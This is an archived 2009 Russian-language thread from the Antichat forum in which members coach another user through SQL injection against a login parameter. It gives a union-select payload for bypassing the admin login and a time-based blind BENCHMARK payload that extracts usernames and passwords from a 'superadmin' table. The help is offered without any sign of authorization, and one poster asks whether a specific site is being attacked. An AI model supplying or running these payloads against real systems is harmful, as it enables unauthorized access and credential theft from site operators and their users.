ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.06.2009, 17:33
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
2 SeNaP
уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк
Последний раз редактировалось Iceangel_; 03.06.2009 в 17:38..
|
|
|
03.06.2009, 17:33
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
2 SeNaP
Там то, что вернет запрос (пароль) должно соответствовать тому, что в переменной p
При волшебных_кавычках = офф
login.php?login=-1'+union+select+123--+&p=123
Вроде так, если я не накосячил
|
|
|
|
03.06.2009, 18:56
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Понял одно, что один уязвимый параметр это login
Последний раз редактировалось SeNaP; 03.06.2009 в 19:00..
|
|
|
|
03.06.2009, 19:37
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
А чего те не понятно....
Товарищь Iceangel_ тебе же написал....
Iceangel_
уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк
|
|
|
|
03.06.2009, 19:51
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Можете хотябы пример написать как крутить.... пожалуйсто
Последний раз редактировалось SeNaP; 03.06.2009 в 19:54..
|
|
|
|
03.06.2009, 20:02
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
SeNaP, откуда этот код ? Ты конкретный сайт хекаешь ? Кинь ссылку сюда либо мну в пм либо попробуй сам то что я написал
.php?login=-1'+union+select+123--+&p=123
Ты должен попасть в админку (но только если magic_quotes_gpc=off)
|
|
|
|
03.06.2009, 20:11
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393
Репутация:
464
|
|
плизз дайте кто ссылку на сервис для перевода в чар и sql hash (типа 0x3a).
все спомнил))) если надо то вот x3k.ru
|
|
|
|
03.06.2009, 20:15
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
плизз дайте кто ссылку на сервис для перевода в чар и sql hash (типа 0x3a).
вот хороший сервис....
http://noxak.ru/tools/
|
|
|
|
03.06.2009, 20:16
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
все же советую сделать как ElteRUS, более рационально, чтобы попасть именно в админку, но если ты захочешь юзать скуль для других целей, вот тебе пример запроса
?login=999'+or+if(ascii(substring ((select+concat_ws(0x3a,login,pass)+from+superadmi n+limit+0,1),1,1))>1,BENCHMARK(1000000,md5(current_date)),2)--+
в случае истинности условия, ответ от сервера будет приходить с запозданием |
|
|
|
03.06.2009, 20:29
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от Iceangel_
все же советую сделать как ElteRUS, более рационально, чтобы попасть именно в админку, но если ты захочешь юзать скуль для других целей, вот тебе пример запроса
в случае истинности условия, ответ от сервера будет приходить с запозданием
Чёт не какой ошибки, сервер работает без опоздания 
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
